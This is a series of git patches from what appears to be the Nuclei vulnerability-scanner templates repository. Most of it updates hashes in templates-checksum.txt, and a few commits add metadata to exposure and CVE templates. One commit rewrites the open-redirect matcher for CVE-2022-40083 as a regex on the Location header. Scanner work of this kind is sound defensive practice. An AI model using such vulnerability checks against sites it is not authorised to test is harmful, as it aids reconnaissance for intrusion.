+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6519,7 +6520,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:be84bfb22db78f7ab52ec26484a1440c71176808 +templates-checksum.txt:658e9a12d7b1b51dd824f706b85dfdae8d69b88d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 2a82723e63a96a3c354879b17c7228aa08f9ff01 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 10:33:56 +0530 Subject: [PATCH 445/609] Update CVE-2022-40083.yaml --- http/cves/2022/CVE-2022-40083.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index dc48518f0a..a0cfc8933d 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -28,13 +28,11 @@ http: matchers-condition: and matchers: - - type: word + - type: regex part: location - words: - - '//interactsh.com/../' + regex: + - '^\s*//interactsh.com/\.\.' - type: status status: - 301 - -# Enhanced by md on 2022/10/18 From 13fc6967b191abe8daab6a326d3d0454365a375c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 05:04:59 +0000 Subject: [PATCH 446/609] TemplateMan Update [Fri Jul 7 05:04:59 UTC 2023] :robot: --- http/exposures/files/bower-json.yaml | 2 ++ http/exposures/files/yarn-lock.yaml | 2 ++ 2 files changed, 4 insertions(+) diff --git a/http/exposures/files/bower-json.yaml b/http/exposures/files/bower-json.yaml index 3b99c3f8c3..c13833b356 100644 --- a/http/exposures/files/bower-json.yaml +++ b/http/exposures/files/bower-json.yaml @@ -8,6 +8,8 @@ info: Bower is a package manager which stores package information in the bower.json file reference: - https://github.com/bower/spec/blob/master/json.md + metadata: + max-request: 1 tags: exposure,files,bower http: diff --git a/http/exposures/files/yarn-lock.yaml b/http/exposures/files/yarn-lock.yaml index b25f92eea8..f1864ee045 100644 --- a/http/exposures/files/yarn-lock.yaml +++ b/http/exposures/files/yarn-lock.yaml @@ -8,6 +8,8 @@ info: The yarn.lock file stores the versions of each Yarn dependency installed. It's a lock file for package.json. reference: - https://classic.yarnpkg.com/lang/en/docs/yarn-lock/ + metadata: + max-request: 1 tags: exposure,files,yarn http: From 0a0525fa67306b803d440eeeac320a528e39862b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 10:38:10 +0530 Subject: [PATCH 447/609] Update CVE-2023-0297.yaml --- http/cves/2023/CVE-2023-0297.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 1479bbda50..9560e9884a 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -18,6 +18,7 @@ info: cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: max-request: 2 + verified: true shodan-query: html:"pyload" tags: huntr,cve,cve2023,rce,pyload,oast From e6bdce1f3f2c814359e854ad37f17df4b95eb05f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 05:11:53 +0000 Subject: [PATCH 448/609] Auto Generated New Template Addition List [Fri Jul 7 05:11:53 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7f01f691f0..20e2734534 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ file/webshell/jsp-webshell.yaml file/webshell/php-webshell.yaml http/cnvd/2022/CNVD-2022-86535.yaml http/cves/2018/CVE-2018-6530.yaml +http/cves/2023/CVE-2023-0297.yaml http/cves/2023/CVE-2023-28121.yaml http/exposed-panels/arangodb-web-Interface.yaml http/exposed-panels/arcserve-panel.yaml From 4d8ba82f26ddadfe0a9f8ecd93955c79f9bd50ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 05:11:57 +0000 Subject: [PATCH 449/609] Auto Generated Templates Checksum [Fri Jul 7 05:11:57 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 150bc4dd49..c5f0e49ae4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2230,6 +2230,7 @@ http/cves/2023/CVE-2023-0099.yaml:9883bc9b1df21a9735c52da82a7689e55842bda4 http/cves/2023/CVE-2023-0126.yaml:de24c5c5d48e69fd17d627b321f6a6cd13bdfd07 http/cves/2023/CVE-2023-0236.yaml:24d5ae19e7c945dfaaf7b240fd276cf3aa190e2a http/cves/2023/CVE-2023-0261.yaml:6c17d82c95c5a12dd3b076059e6d90f248e2c970 +http/cves/2023/CVE-2023-0297.yaml:78308363f0703f78bcdb8c767b9f9cfd9d758584 http/cves/2023/CVE-2023-0527.yaml:eef3f7eda2205d193e376033b62a4ef82239d63d http/cves/2023/CVE-2023-0552.yaml:19ffa4072e3f509e9176b63212c9f9ec02149fb6 http/cves/2023/CVE-2023-0562.yaml:b79f3b73e6955a81518118dab31e9a928f01e71e @@ -3527,7 +3528,7 @@ http/exposures/files/atom-sync-remote.yaml:4f56d5f17c86b48d47c9492ff37c0e9e53491 http/exposures/files/axis-happyaxis.yaml:7c79b675fb9882c2ccd2c39b41f9d7bd7da540cd http/exposures/files/azure-pipelines-exposed.yaml:9324ec7e5dbb0c7eb902074418f3ebe15d79fd9d http/exposures/files/bitbucket-pipelines.yaml:b15296a2d307f3992f20af82eaed3b76ccc81084 -http/exposures/files/bower-json.yaml:534d984892a0e9c6528ca11638be0dacc04dd8f7 +http/exposures/files/bower-json.yaml:4a2c6101109066af8b7417ffab17738a33d07774 http/exposures/files/build-properties.yaml:b662be2a91e9b9244f413333e3e6572f535fdc23 http/exposures/files/cargo-lock-package.yaml:c42864f006b58db6889740700d9652299a0f1d21 http/exposures/files/cargo-toml-file.yaml:dd41012cf3b8b0d0564e80b27d252cd140bc5217 @@ -3623,7 +3624,7 @@ http/exposures/files/wordpress-readme-file.yaml:6b41d48283a39137faf5bf9fc013e58d http/exposures/files/wp-cli-exposure.yaml:04a4282c2a694a0e024f78da5d78dcc81d47cfd5 http/exposures/files/ws-ftp-ini.yaml:63e0a7bce8ef6aa82466e9cc843350f46c49817b http/exposures/files/xampp-environment-variables.yaml:0c3970725b254884aa036c9af32c4da79d8415df -http/exposures/files/yarn-lock.yaml:452c8de310ce300c37464f498dd99e2ca8f5a792 +http/exposures/files/yarn-lock.yaml:8aa5da493d3ebdfe7e4c5586bc8bfce79a0da202 http/exposures/logs/access-log.yaml:e57d9ce5b1f26ef00fa31c89e2d540995c3f7e26 http/exposures/logs/badarg-log.yaml:77810a7944c58fca1f01d742135b365bab8168bb http/exposures/logs/clockwork-php-page.yaml:28267b1a0c73ade5080473c934d997b3695c92a7 @@ -6520,7 +6521,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:658e9a12d7b1b51dd824f706b85dfdae8d69b88d +templates-checksum.txt:4a6ce126b1a3cb110daaa68a4455df90e827e7be wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c 